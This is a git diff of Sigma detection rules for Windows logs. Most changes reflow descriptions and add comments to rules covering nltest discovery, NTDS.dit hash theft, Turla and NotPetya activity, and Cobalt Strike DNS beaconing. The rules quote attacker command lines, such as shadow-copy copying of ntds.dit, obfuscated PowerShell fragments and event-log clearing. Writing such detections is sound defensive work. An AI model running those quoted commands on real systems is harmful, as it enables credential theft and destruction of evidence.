CommandLine|contains: domain_trusts - NewProcessName|endswith: \nltest.exe + - CommandLine|contains|all: + - -filter + - trustedDomain + NewProcessName|endswith: \dsquery.exe + - CommandLine|contains: domain_trusts + NewProcessName|endswith: \nltest.exe condition: process_creation and selection falsepositives: - Administration of systems. diff --git a/sigma/builtin/deprecated/win_lateral_movement_condrv.yml b/sigma/builtin/deprecated/win_lateral_movement_condrv.yml index 188213bf9..3ac136c3b 100644 --- a/sigma/builtin/deprecated/win_lateral_movement_condrv.yml +++ b/sigma/builtin/deprecated/win_lateral_movement_condrv.yml @@ -1,10 +1,7 @@ title: Lateral Movement Indicator ConDrv id: 29d31aee-30f4-4006-85a9-a4a02d65306c -status: deprecated -description: This event was observed on the target host during lateral movement. The - process name within the event contains the process spawned post compromise. Account - Name within the event contains the compromised user account name. This event should - to be correlated with 4624 and 4688 for further intrusion context. +status: deprecated #Too many FP +description: This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. Account Name within the event contains the compromised user account name. This event should to be correlated with 4624 and 4688 for further intrusion context. author: Janantha Marasinghe date: 2021/04/27 modified: 2022/05/14 diff --git a/sigma/builtin/deprecated/win_security_group_modification_logging.yml b/sigma/builtin/deprecated/win_security_group_modification_logging.yml index 4b3a325bb..8e3be50b5 100644 --- a/sigma/builtin/deprecated/win_security_group_modification_logging.yml +++ b/sigma/builtin/deprecated/win_security_group_modification_logging.yml @@ -1,23 +1,14 @@ title: Group Modification Logging id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e status: deprecated -description: 'Configure systems to issue a log entry and alert when an account is - added to or removed from any group assigned administrative privileges. - +description: | + Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges. Sigma detects - Event ID 4728 indicates a "Member is added to a Security Group". - Event ID 4729 indicates a "Member is removed from a Security enabled-group". - Event ID 4730 indicates a "Security Group is deleted". - The case is not applicable for Unix OS. - - Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and - 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP. - - ' + Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP. references: - https://www.cisecurity.org/controls/cis-controls-list/ - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf @@ -31,6 +22,32 @@ references: author: Alexandr Yampolskyi, SOC Prime date: 2019/03/26 modified: 2023/04/26 +# tags: + # - CSC4 + # - CSC4.8 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AT-2 + # - NIST CSF 1.1 PR.MA-2 + # - NIST CSF 1.1 PR.PT-3 + # - ISO 27002-2013 A.9.1.1 + # - ISO 27002-2013 A.9.2.2 + # - ISO 27002-2013 A.9.2.3 + # - ISO 27002-2013 A.9.2.4 + # - ISO 27002-2013 A.9.2.5 + # - ISO 27002-2013 A.9.2.6 + # - ISO 27002-2013 A.9.3.1 + # - ISO 27002-2013 A.9.4.1 + # - ISO 27002-2013 A.9.4.2 + # - ISO 27002-2013 A.9.4.3 + # - ISO 27002-2013 A.9.4.4 + # - PCI DSS 3.2 2.1 + # - PCI DSS 3.2 7.1 + # - PCI DSS 3.2 7.2 + # - PCI DSS 3.2 7.3 + # - PCI DSS 3.2 8.1 + # - PCI DSS 3.2 8.2 + # - PCI DSS 3.2 8.3 + # - PCI DSS 3.2 8.7 logsource: product: windows service: security @@ -39,12 +56,12 @@ detection: Channel: Security selection: EventID: - - 4728 - - 4729 - - 4730 - - 633 - - 632 - - 634 + - 4728 # A member was added to a security-enabled global group + - 4729 # A member was removed from a security-enabled global group + - 4730 # A security-enabled global group was deleted + - 633 # Security Enabled Global Group Member Removed + - 632 # Security Enabled Global Group Member Added + - 634 # Security Enabled Global Group Deleted condition: security and selection falsepositives: - Unknown diff --git a/sigma/builtin/deprecated/win_security_lolbas_execution_of_nltest.yml b/sigma/builtin/deprecated/win_security_lolbas_execution_of_nltest.yml index a330ad641..bfd8d86ac 100644 --- a/sigma/builtin/deprecated/win_security_lolbas_execution_of_nltest.yml +++ b/sigma/builtin/deprecated/win_security_lolbas_execution_of_nltest.yml @@ -1,8 +1,7 @@ title: Correct Execution of Nltest.exe id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 status: deprecated -description: The attacker might use LOLBAS nltest.exe for discovery of domain controllers, - domain trusts, parent domain and the current user permissions. +description: The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions. references: - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm - https://attack.mitre.org/software/S0359/ @@ -11,9 +10,9 @@ date: 2021/10/04 modified: 2023/02/02 tags: - attack.discovery - - attack.t1482 - - attack.t1018 - - attack.t1016 + - attack.t1482 # enumerate trusted domains by using commands such as nltest /domain_trusts + - attack.t1018 # enumerate remote domain controllers using options such as /dclist and /dsgetdc + - attack.t1016 # enumerate the parent domain of a local machine using /parentdomain logsource: product: windows service: security diff --git a/sigma/builtin/deprecated/win_susp_esentutl_activity.yml b/sigma/builtin/deprecated/win_susp_esentutl_activity.yml index 92a10483c..7008e5553 100644 --- a/sigma/builtin/deprecated/win_susp_esentutl_activity.yml +++ b/sigma/builtin/deprecated/win_susp_esentutl_activity.yml @@ -1,9 +1,7 @@ title: Suspicious Esentutl Use id: 56a8189f-11b2-48c8-8ca7-c54b03c2fbf7 status: deprecated -description: Detects flags often used with the LOLBAS Esentutl for malicious activity. - It could be used in rare cases by administrators to access locked files or during - maintenance. +description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. author: Florian Roth (Nextron Systems) date: 2020/05/23 modified: 2022/04/11 @@ -23,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' /vss ' - ' /y ' condition: process_creation and selection diff --git a/sigma/builtin/deprecated/win_susp_vssadmin_ntds_activity.yml b/sigma/builtin/deprecated/win_susp_vssadmin_ntds_activity.yml index e30624ea7..554165915 100644 --- a/sigma/builtin/deprecated/win_susp_vssadmin_ntds_activity.yml +++ b/sigma/builtin/deprecated/win_susp_vssadmin_ntds_activity.yml @@ -1,8 +1,7 @@ title: Activity Related to NTDS.dit Domain Hash Retrieval id: b932b60f-fdda-4d53-8eda-a170c1d97bbd status: deprecated -description: Detects suspicious commands that could be related to activity that uses - volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely +description: Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely author: Florian Roth (Nextron Systems), Michael Haag date: 2019/01/16 modified: 2022/04/11 @@ -23,7 +22,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine: + CommandLine: - vssadmin.exe Delete Shadows - 'vssadmin create shadow /for=C:' - copy \\?\GLOBALROOT\Device\\*\windows\ntds\ntds.dit diff --git a/sigma/builtin/deprecated/win_system_service_install_susp_double_ampersand.yml b/sigma/builtin/deprecated/win_system_service_install_susp_double_ampersand.yml index bed445ded..343dee973 100644 --- a/sigma/builtin/deprecated/win_system_service_install_susp_double_ampersand.yml +++ b/sigma/builtin/deprecated/win_system_service_install_susp_double_ampersand.yml @@ -1,8 +1,7 @@ title: New Service Uses Double Ampersand in Path id: ca83e9f3-657a-45d0-88d6-c1ac280caf53 status: deprecated -description: Detects a service installation that uses a suspicious double ampersand - used in the image path value +description: Detects a service installation that uses a suspicious double ampersand used in the image path value references: - Internal Research author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml b/sigma/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml index bf388ea20..d12cf61cc 100644 --- a/sigma/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml +++ b/sigma/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml @@ -1,8 +1,7 @@ title: Loading Diagcab Package From Remote Path id: 50cb47b8-2c33-4b23-a2e9-4600657d9746 status: test -description: Detects loading of diagcab packages from a remote path, as seen in DogWalk - vulnerability +description: Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability references: - https://twitter.com/nas_bench/status/1539679555908141061 - https://twitter.com/j00sean/status/1537750439701225472 @@ -18,7 +17,7 @@ detection: Channel: Microsoft-Windows-Diagnosis-Scripted/Operational selection: EventID: 101 - PackagePath|contains: \\\\ + PackagePath|contains: \\\\ # Example would be: \\webdav-test.herokuapp.com@ssl\DavWWWRoot\package condition: diagnosis_scripted and selection falsepositives: - Legitimate package hosted on a known and authorized remote location diff --git a/sigma/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml b/sigma/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml index 2f6985d8a..90aac3c83 100644 --- a/sigma/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml +++ b/sigma/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml @@ -1,11 +1,10 @@ title: Suspicious Cobalt Strike DNS Beaconing - DNS Client id: 0d18728b-f5bf-4381-9dcf-915539fff6c2 related: - - id: f356a9c4-effd-4608-bbf8-408afd5cd006 - type: similar + - id: f356a9c4-effd-4608-bbf8-408afd5cd006 + type: similar status: test -description: Detects a program that invoked suspicious DNS queries known from Cobalt - Strike beacons +description: Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons references: - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/ @@ -17,8 +16,7 @@ tags: logsource: product: windows service: dns-client - definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event - Log must be enabled/collected in order to receive the events.' + definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.' detection: dns_client: Channel: Microsoft-Windows-DNS Client Events/Operational diff --git a/sigma/builtin/dns_client/win_dns_client_anonymfiles_com.yml b/sigma/builtin/dns_client/win_dns_client_anonymfiles_com.yml index fa148c64b..abddacb4d 100644 --- a/sigma/builtin/dns_client/win_dns_client_anonymfiles_com.yml +++ b/sigma/builtin/dns_client/win_dns_client_anonymfiles_com.yml @@ -1,11 +1,10 @@ title: DNS Query for Anonfiles.com Domain - DNS Client id: 29f171d7-aa47-42c7-9c7b-3c87938164d9 related: - - id: 065cceea-77ec-4030-9052-fc0affea7110 - type: similar + - id: 065cceea-77ec-4030-9052-fc0affea7110 + type: similar status: test -description: Detects DNS queries for anonfiles.com, which is an anonymous file upload - platform often used for malicious purposes +description: Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes references: - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte author: Nasreddine Bencherchali (Nextron Systems) @@ -16,8 +15,7 @@ tags: logsource: product: windows service: dns-client - definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event - Log must be enabled/collected in order to receive the events.' + definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.' detection: dns_client: Channel: Microsoft-Windows-DNS Client Events/Operational diff --git a/sigma/builtin/dns_client/win_dns_client_mega_nz.yml b/sigma/builtin/dns_client/win_dns_client_mega_nz.yml index 402299410..dc63fcf36 100644 --- a/sigma/builtin/dns_client/win_dns_client_mega_nz.yml +++ b/sigma/builtin/dns_client/win_dns_client_mega_nz.yml @@ -1,8 +1,8 @@ title: DNS Query To MEGA Hosting Website - DNS Client id: 66474410-b883-415f-9f8d-75345a0a66a6 related: - - id: 613c03ba-0779-4a53-8a1f-47f914a4ded3 - type: similar + - id: 613c03ba-0779-4a53-8a1f-47f914a4ded3 + type: similar status: test description: Detects DNS queries for subdomains related to MEGA sharing website references: @@ -15,8 +15,7 @@ tags: logsource: product: windows service: dns-client - definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event - Log must be enabled/collected in order to receive the events.' + definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.' detection: dns_client: Channel: Microsoft-Windows-DNS Client Events/Operational diff --git a/sigma/builtin/dns_client/win_dns_client_tor_onion.yml b/sigma/builtin/dns_client/win_dns_client_tor_onion.yml index 1c1ebd04f..651ec29be 100644 --- a/sigma/builtin/dns_client/win_dns_client_tor_onion.yml +++ b/sigma/builtin/dns_client/win_dns_client_tor_onion.yml @@ -1,8 +1,8 @@ title: Query Tor Onion Address - DNS Client id: 8384bd26-bde6-4da9-8e5d-4174a7a47ca2 related: - - id: b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544 - type: similar + - id: b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544 + type: similar status: test description: Detects DNS resolution of an .onion address related to Tor routing networks references: @@ -15,8 +15,7 @@ tags: logsource: product: windows service: dns-client - definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event - Log must be enabled/collected in order to receive the events.' + definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.' detection: dns_client: Channel: Microsoft-Windows-DNS Client Events/Operational diff --git a/sigma/builtin/dns_client/win_dns_client_ufile_io.yml b/sigma/builtin/dns_client/win_dns_client_ufile_io.yml index 9db923639..26f404283 100644 --- a/sigma/builtin/dns_client/win_dns_client_ufile_io.yml +++ b/sigma/builtin/dns_client/win_dns_client_ufile_io.yml @@ -1,11 +1,10 @@ title: DNS Query To Ufile.io - DNS Client id: 090ffaad-c01a-4879-850c-6d57da98452d related: - - id: 1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b - type: similar + - id: 1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b + type: similar status: experimental -description: Detects DNS queries to "ufile.io", which was seen abused by malware and - threat actors as a method for data exfiltration +description: Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration references: - https://thedfirreport.com/2021/12/13/diavol-ransomware/ author: Nasreddine Bencherchali (Nextron Systems) @@ -17,8 +16,7 @@ tags: logsource: product: windows service: dns-client - definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event - Log must be enabled/collected in order to receive the events.' + definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.' detection: dns_client: Channel: Microsoft-Windows-DNS Client Events/Operational @@ -27,7 +25,6 @@ detection: QueryName|contains: ufile.io condition: dns_client and selection falsepositives: - - DNS queries for "ufile" are not malicious by nature necessarily. Investigate - the source to determine the necessary actions to take + - DNS queries for "ufile" are not malicious by nature necessarily. Investigate the source to determine the necessary actions to take level: low ruletype: Sigma diff --git a/sigma/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml b/sigma/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml index 6e41fe9c4..ffca67d76 100644 --- a/sigma/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml +++ b/sigma/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml @@ -16,7 +16,7 @@ detection: dns_server: Channel: DNS Server selection: - EventID: 6004 + EventID: 6004 # The DNS server received a zone transfer request from %1 for a non-existent or non-authoritative zone %2. condition: dns_server and selection falsepositives: - Unlikely diff --git a/sigma/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml b/sigma/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml index aaeb09e1c..98dab8c3f 100644 --- a/sigma/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml +++ b/sigma/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml @@ -1,13 +1,12 @@ title: DNS Server Error Failed Loading the ServerLevelPluginDLL id: cbe51394-cd93-4473-b555-edf0144952d9 related: - - id: e61e8a88-59a9-451c-874e-70fcc9740d67 - type: derived - - id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 - type: derived + - id: e61e8a88-59a9-451c-874e-70fcc9740d67 + type: derived + - id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 + type: derived status: test -description: Detects a DNS server error in which a specified plugin DLL (in registry) - could not be loaded +description: Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded references: - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 - https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx diff --git a/sigma/builtin/driverframeworks/win_usb_device_plugged.yml b/sigma/builtin/driverframeworks/win_usb_device_plugged.yml index 1577c5f6a..2bdcf202b 100644 --- a/sigma/builtin/driverframeworks/win_usb_device_plugged.yml +++ b/sigma/builtin/driverframeworks/win_usb_device_plugged.yml @@ -14,16 +14,15 @@ tags: logsource: product: windows service: driver-framework - definition: Requires enabling and collection of the Microsoft-Windows-DriverFrameworks-UserMode/Operational - eventlog + definition: Requires enabling and collection of the Microsoft-Windows-DriverFrameworks-UserMode/Operational eventlog detection: driver_framework: Channel: Microsoft-Windows-DriverFrameworks-UserMode/Operational selection: EventID: - - 2003 - - 2100 - - 2102 + - 2003 # Loading drivers + - 2100 # Pnp or power management + - 2102 # Pnp or power management condition: driver_framework and selection falsepositives: - Legitimate administrative activity diff --git a/sigma/builtin/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml b/sigma/builtin/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml index a65e4c5f3..7f11bd5e4 100644 --- a/sigma/builtin/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml +++ b/sigma/builtin/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml @@ -24,10 +24,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - zxFunction - RemoteDiskXXXXX - NewProcessName|endswith: \rundll32.exe + NewProcessName|endswith: \rundll32.exe condition: process_creation and selection fields: - CommandLine diff --git a/sigma/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml b/sigma/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml index 47a704f4c..a5372e7bc 100644 --- a/sigma/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml +++ b/sigma/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml @@ -25,7 +25,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine: + CommandLine: - net use \\\\%DomainController%\C$ "P@ssw0rd" * - dir c:\\*.doc* /s - dir %TEMP%\\*.exe diff --git a/sigma/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml b/sigma/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml index 8718e0ce5..2bf684be1 100644 --- a/sigma/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml +++ b/sigma/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml @@ -22,12 +22,12 @@ detection: EventID: 4688 Channel: Security selection_cli_1: - CommandLine|contains: + CommandLine|contains: - tracert -h 10 yahoo.com - .WSqmCons))|iex; - Fr`omBa`se6`4Str`ing selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - net use https://docs.live.net - '@aol.co.uk' condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml b/sigma/builtin/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml index ba09ee368..fe8565135 100644 --- a/sigma/builtin/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml +++ b/sigma/builtin/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml @@ -1,8 +1,7 @@ title: Exploit for CVE-2015-1641 id: 7993792c-5ce2-4475-a3db-a3a5539827ef status: stable -description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used - in exploits for CVE-2015-1641 +description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641 references: - https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/ - https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100 @@ -23,7 +22,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \WINWORD.EXE - NewProcessName|endswith: \MicroScMgmt.exe + NewProcessName|endswith: \MicroScMgmt.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml b/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml index 35a7d8b21..e13c6ca95 100644 --- a/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml +++ b/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml @@ -1,8 +1,7 @@ title: Exploit for CVE-2017-0261 id: 864403a1-36c9-40a2-a982-4c9a45f7d833 status: test -description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits - for CVE-2017-0261 and CVE-2017-0262 +description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262 references: - https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html author: Florian Roth (Nextron Systems) @@ -25,10 +24,9 @@ detection: Channel: Security selection: ParentProcessName|endswith: \WINWORD.EXE - NewProcessName|contains: \FLTLDR.exe + NewProcessName|contains: \FLTLDR.exe condition: process_creation and selection falsepositives: - - Several false positives identified, check for suspicious file names or locations - (e.g. Temp folders) + - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders) level: medium ruletype: Sigma diff --git a/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml b/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml index 3e83ba335..1ed94956f 100644 --- a/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml +++ b/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml @@ -1,8 +1,7 @@ title: Droppers Exploiting CVE-2017-11882 id: 678eb5f4-8597-4be6-8be7-905e4234b53a status: stable -description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other - sub processes like mshta.exe +description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe references: - https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100 - https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw diff --git a/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml b/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml index 9840706c0..6f92a3317 100644 --- a/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml +++ b/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml @@ -1,8 +1,7 @@ title: Exploit for CVE-2017-8759 id: fdd84c68-a1f6-47c9-9477-920584f94905 status: test -description: Detects Winword starting uncommon sub process csc.exe as used in exploits - for CVE-2017-8759 +description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759 references: - https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100 - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100 @@ -26,7 +25,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \WINWORD.EXE - NewProcessName|endswith: \csc.exe + NewProcessName|endswith: \csc.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml b/sigma/builtin/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml index ac7b9cd75..a6014b1e8 100644 --- a/sigma/builtin/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml +++ b/sigma/builtin/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml @@ -21,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|contains|all: - - \AppData\Roaming\Oracle - - \java - - '.exe ' - - CommandLine|contains|all: - - cscript.exe - - Retrive - - '.vbs ' + - CommandLine|contains|all: + - \AppData\Roaming\Oracle + - \java + - '.exe ' + - CommandLine|contains|all: + - cscript.exe + - Retrive + - '.vbs ' condition: process_creation and selection level: high ruletype: Sigma diff --git a/sigma/builtin/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml b/sigma/builtin/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml index bb9a15cb5..b358483bc 100644 --- a/sigma/builtin/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml +++ b/sigma/builtin/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml @@ -21,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32.exe - InstallArcherSvc condition: process_creation and selection diff --git a/sigma/builtin/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml b/sigma/builtin/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml index 136b6d384..2298b7966 100644 --- a/sigma/builtin/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml +++ b/sigma/builtin/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml @@ -1,9 +1,7 @@ title: NotPetya Ransomware Activity id: 79aeeb41-8156-4fac-a0cd-076495ab82a1 status: test -description: Detects NotPetya ransomware activity in which the extracted passwords - are passed back to the main module via named pipe, the file system journal of - drive C is deleted and Windows eventlogs are cleared using wevtutil +description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil references: - https://securelist.com/schroedingers-petya/78870/ - https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100 @@ -26,15 +24,15 @@ detection: EventID: 4688 Channel: Security selection_specific_pattern: - CommandLine|contains: + CommandLine|contains: - 'wevtutil cl Application & fsutil usn deletejournal /D C:' - dllhost.dat %WINDIR%\ransoms selection_rundll32: - CommandLine|endswith: + CommandLine|endswith: - .dat,#1 - - '.dat #1' + - '.dat #1' # Sysmon removes comma - .zip.dll",#1 - NewProcessName|endswith: \rundll32.exe + NewProcessName|endswith: \rundll32.exe selection_perfc_keyword: - \perfc.dat condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml b/sigma/builtin/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml index fb45a5d4d..72958fbd3 100644 --- a/sigma/builtin/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml +++ b/sigma/builtin/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml @@ -1,8 +1,7 @@ title: Potential PlugX Activity id: aeab5ec5-be14-471a-80e8-e344418305c2 status: test -description: Detects the execution of an executable that is typically used by PlugX - for DLL side loading starting from an uncommon location +description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location references: - http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/ - https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/ @@ -22,84 +21,77 @@ detection: EventID: 4688 Channel: Security selection_cammute: - NewProcessName|endswith: \CamMute.exe + NewProcessName|endswith: \CamMute.exe filter_cammute: - NewProcessName|contains: + NewProcessName|contains: - \Lenovo\Communication Utility\ - \Lenovo\Communications Utility\ selection_chrome_frame: - NewProcessName|endswith: \chrome_frame_helper.exe + NewProcessName|endswith: \chrome_frame_helper.exe filter_chrome_frame: - NewProcessName|contains: \Google\Chrome\application\ + NewProcessName|contains: \Google\Chrome\application\ selection_devemu: - NewProcessName|endswith: \dvcemumanager.exe + NewProcessName|endswith: \dvcemumanager.exe filter_devemu: - NewProcessName|contains: \Microsoft Device Emulator\ + NewProcessName|contains: \Microsoft Device Emulator\ selection_gadget: - NewProcessName|endswith: \Gadget.exe + NewProcessName|endswith: \Gadget.exe filter_gadget: - NewProcessName|contains: \Windows Media Player\ + NewProcessName|contains: \Windows Media Player\ selection_hcc: - NewProcessName|endswith: \hcc.exe + NewProcessName|endswith: \hcc.exe filter_hcc: - NewProcessName|contains: \HTML Help Workshop\ + NewProcessName|contains: \HTML Help Workshop\ selection_hkcmd: - NewProcessName|endswith: \hkcmd.exe + NewProcessName|endswith: \hkcmd.exe filter_hkcmd: - NewProcessName|contains: + NewProcessName|contains: - \System32\ - \SysNative\ - \SysWow64\ selection_mc: - 